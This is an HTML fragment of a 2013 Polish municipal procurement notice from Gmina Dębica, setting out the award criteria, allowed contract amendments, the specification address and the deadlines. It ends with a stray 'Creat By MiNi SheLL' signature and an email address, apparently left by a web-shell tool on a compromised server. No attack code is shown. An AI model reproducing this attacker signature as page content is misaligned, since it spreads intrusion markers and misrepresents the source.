<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZMIANY W UMOWIE
1.   Wszelkie zmiany, jakie strony chciałyby wprowadzić do ustaleń wynikających z niniejszej umowy, wymagają formy pisemnej  i zgody obu stron pod rygorem nieważności takich zmian.
2.  Możliwa jest zmiana umowy dotycząca :
1) terminu realizacji przedmiotu zamówienia w uzgodnieniu z Wykonawcą w następujących przypadkach:
a) w przypadkach określonych w pkt.2)
b)	wstrzymania robót przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę robót budowlanych,
               np. dokonanie odkrywki archeologicznej, odkrycie niewybuchu, itp.
         c) wystąpienia siły wyższej np. trąby powietrznej, pożaru, powodzi, uniemożliwiające prowadzenie robót
               budowlanych w nadzorowanej inwestycji
         d)  wystąpienia niekorzystnych warunków atmosferycznych, potwierdzonych przez IMiGW, uniemożliwiających 
               dochowanie wymogów technicznych i technologicznych przy prowadzonych robotach budowlanych tj. : 
  - temperatury otoczenia poniżej - 10 ° C utrzymującej się przez minimum 3 dni,
  - ciągłych opadów, trwających minimum 3 dni ,przekraczających średnie opady na danym terenie .
e)  wystąpienia osuwisk gruntu nie ustalonych w oparciu o dokonane badania geologiczne lub występujące ponad
     normy, dotyczy również wystąpienia innych, nie dających się przewidzieć zjawisk geologicznych i 
hydrologicznych pojawiających się w trakcie budowy,
f)  zmiany  terminu wykonania robót  przez wykonawcę robót budowlanych,
g) przejściowego braku środków na sfinansowanie robót budowlanych do czasu ich uzyskania,
h) strona powołująca się na okoliczności powodujące przedłużenie terminu winna powiadomić drugą
stronę, na piśmie, w terminie do 3 dni od dnia ustania tych przyczyn pod rygorem utraty powoływania się
na te okoliczności,
i)	zmiana terminu realizacji przedmiotu zamówienia będzie proporcjonalna  do okresu trwania w-w przypadków. 

2)	zakresu i sposobu wykonania przedmiotu zamówienia w przypadku:
a)	zaistnienia istotnych okoliczności powodujących, że wykonanie umowy w zakresie przewidzianym w dokumentacji  projektowej nie jest możliwe, czego nie można było przewidzieć w chwili zawarcia umowy;
b)	zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych  poszczególnych elementów obiektu niż przewidzianych w dokumentacji projektowej;
c)	zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
d)	zmian  w dokumentacji projektowej, oraz  w ilościach i rodzajach robót z zachowaniem jednak zasady nie wykraczania poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia. Osobą upoważnioną i obowiązaną do dokonania kwalifikacji planowanego odstąpienia od zatwierdzonego projektu budowlanego i wykonawczego jest projektant. Zmiana taka musi być zaakceptowana przez Zamawiającego
3)   Innych postanowień umowy w przypadkach:
a) zmiany nazwy zadania,
b) 	zmiany inspektora nadzoru w poszczególnych branżach  - warunkiem niezbędnym do dokonania tej zmiany jest posiadanie uprawnień i doświadczenia przez  nowe osoby wskazane przez Wykonawcę na poziomie nie mniejszym niż określony w SIWZ  Rozdział V ust.2 pkt 2.
4) Warunkiem dokonania zmian  określonych w ust.2 pkt.1 jest wpływ ich przyczyn, na dochowanie terminu
       wykonania robót budowlanych w nadzorowanej inwestycji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dębica, 39-200 Dębica, ul. Stefana Batorego 13 - pokój 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2013 godzina 09:00, miejsce: Urząd Gminy Dębica, 39-200 Dębica, ul. Stefana Batorego 13 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie dofinansowane z środków Funduszu Rozwoju Kultury Fizycznej w ramach -Programu rozwoju inwestycji sportowych-..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com